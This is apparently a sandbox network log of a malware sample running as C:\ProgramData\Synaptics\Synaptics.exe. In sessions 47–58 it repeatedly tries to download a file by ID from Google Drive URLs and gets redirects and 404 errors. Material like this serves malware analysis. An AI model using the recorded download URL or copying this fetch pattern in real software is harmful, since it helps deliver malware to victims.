                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.4 | 49819 | 142.250.186.129 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:20 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
2024-12-30 03:59:21 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC5tJHf4H4wg8BLFJONSAHJZm-kXJ9zP2gE6Yl9g5q0nXxIKHP3RGju89wN_uQJfeP4f
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:21 GMT
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-v9oVnnLZ_TdbiTuMsckhvQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
2024-12-30 03:59:21 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 03:59:21 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="nG00jmT-h6sE2gs-DEc95A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 03:59:21 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.4 | 49822 | 142.250.186.129 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:21 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
49 | 192.168.2.4 | 49824 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:21 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=Wx-G4O6EShb7Snmlh2857_NmWBV2T-yG2QsNO31GjRaZavqqR41hWX1_5xCZCTAqdEzAPkLnbI0QV6s9vct8T5LnTe9TZ6tdxigzizMteDlRATYlBvzufdbZXHMvzyCqPyGAByCDy8A5KGUQB0tUVAh6FqkNmYN91BjoYlg65oOdm-I5eyfWK-yZ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
50 | 192.168.2.4 | 49821 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:21 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=Wx-G4O6EShb7Snmlh2857_NmWBV2T-yG2QsNO31GjRaZavqqR41hWX1_5xCZCTAqdEzAPkLnbI0QV6s9vct8T5LnTe9TZ6tdxigzizMteDlRATYlBvzufdbZXHMvzyCqPyGAByCDy8A5KGUQB0tUVAh6FqkNmYN91BjoYlg65oOdm-I5eyfWK-yZ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
51 | 192.168.2.4 | 49825 | 142.250.186.129 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:22 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
2024-12-30 03:59:22 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC7NrePA23nqr-8VPuk6xdVxqE0KvVtHdWOjxKsVlOH960v7IzzLABjXhCMmaoOehB39
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:22 GMT
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-nWhDCUM-AT6CAjgiwygedw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
2024-12-30 03:59:22 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 03:59:22 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="JaZ4cPr4PKEKCoHL3koaKw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 03:59:22 UTC | 115 | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
52 | 192.168.2.4 | 49827 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:22 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=Wx-G4O6EShb7Snmlh2857_NmWBV2T-yG2QsNO31GjRaZavqqR41hWX1_5xCZCTAqdEzAPkLnbI0QV6s9vct8T5LnTe9TZ6tdxigzizMteDlRATYlBvzufdbZXHMvzyCqPyGAByCDy8A5KGUQB0tUVAh6FqkNmYN91BjoYlg65oOdm-I5eyfWK-yZ
2024-12-30 03:59:23 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:23 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-09Vv-xMslZ4cEXMYBE9FzA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
53 | 192.168.2.4 | 49826 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:22 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=Wx-G4O6EShb7Snmlh2857_NmWBV2T-yG2QsNO31GjRaZavqqR41hWX1_5xCZCTAqdEzAPkLnbI0QV6s9vct8T5LnTe9TZ6tdxigzizMteDlRATYlBvzufdbZXHMvzyCqPyGAByCDy8A5KGUQB0tUVAh6FqkNmYN91BjoYlg65oOdm-I5eyfWK-yZ
2024-12-30 03:59:23 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:23 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-v53Fe4yPNSDxoeTvbbaXqQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
54 | 192.168.2.4 | 49832 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:23 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=Wx-G4O6EShb7Snmlh2857_NmWBV2T-yG2QsNO31GjRaZavqqR41hWX1_5xCZCTAqdEzAPkLnbI0QV6s9vct8T5LnTe9TZ6tdxigzizMteDlRATYlBvzufdbZXHMvzyCqPyGAByCDy8A5KGUQB0tUVAh6FqkNmYN91BjoYlg65oOdm-I5eyfWK-yZ
2024-12-30 03:59:24 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:24 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-SBeNGRTz8h7SEXg1F1n3vg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
55 | 192.168.2.4 | 49833 | 142.250.186.129 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:23 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
2024-12-30 03:59:24 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC7_3KorrprvN0ITSvJTREZ9_I7H0v2rbI2RiSyJfPNvJPmZA0nkXnfu0kUR0yIW-pzL
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:24 GMT
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-hOMixjnidXGtbZf0VuXjjw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
2024-12-30 03:59:24 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 03:59:24 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="tAKtJO5Kmo-iNiKpyAKdfg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 03:59:24 UTC | 115 | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
56 | 192.168.2.4 | 49830 | 142.250.186.129 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:23 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
2024-12-30 03:59:24 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC5KZgvyVJBcXjzp-d0nimYBH1x6KvptOFlwHqy9lBnJq8Hpz17cZAs9ZnjlEXEsHnTJ
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:24 GMT
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-_5AldXTFMO78Tgwb3_UBqg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
2024-12-30 03:59:24 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 03:59:24 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="mvkQAQ3bFY2U6WsaavNFDg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 03:59:24 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
57 | 192.168.2.4 | 49831 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:23 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=Wx-G4O6EShb7Snmlh2857_NmWBV2T-yG2QsNO31GjRaZavqqR41hWX1_5xCZCTAqdEzAPkLnbI0QV6s9vct8T5LnTe9TZ6tdxigzizMteDlRATYlBvzufdbZXHMvzyCqPyGAByCDy8A5KGUQB0tUVAh6FqkNmYN91BjoYlg65oOdm-I5eyfWK-yZ
2024-12-30 03:59:24 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:24 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-ngCiOefxyJpzJcpYasGWFw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
58 | 192.168.2.4 | 49836 | 142.250.186.129 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:24 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
